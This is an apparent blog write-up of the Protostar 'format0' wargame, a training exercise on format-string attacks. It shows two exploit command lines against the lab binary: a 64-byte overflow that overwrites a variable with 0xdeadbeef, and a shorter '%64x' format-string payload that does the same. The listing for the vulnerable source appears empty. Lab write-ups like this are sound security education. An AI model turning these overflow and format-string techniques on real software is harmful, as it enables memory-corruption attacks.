Protostar vm, format0
Here is the source of the vulnerable program :
1 |
|
This challenge is about learning the basics of format strings attacks.
First of, let’s note that this code is vulnerable to a simple buffer overflow, and we can use the same trick we used in stack1 :
1 | user@protostar:~$ /opt/protostar/bin/./format0 `python -c 'print 64*"A"+"\xef\xbe\xad\xde"'` |
But that’s not really why we’re here, plus the challenge’s webpage tells us that we should only use 10 bytes or less. So let’s dig into format strings attacks.
After some research, I found out that format identifiers can have a minimum field width. This means that you can actually reproduce the buffer overflow used above by padding the buffer with this trick :
1 | user@protostar:~$ /opt/protostar/bin/./format0 `python -c 'print "%64x"+"\xef\xbe\xad\xde"'` |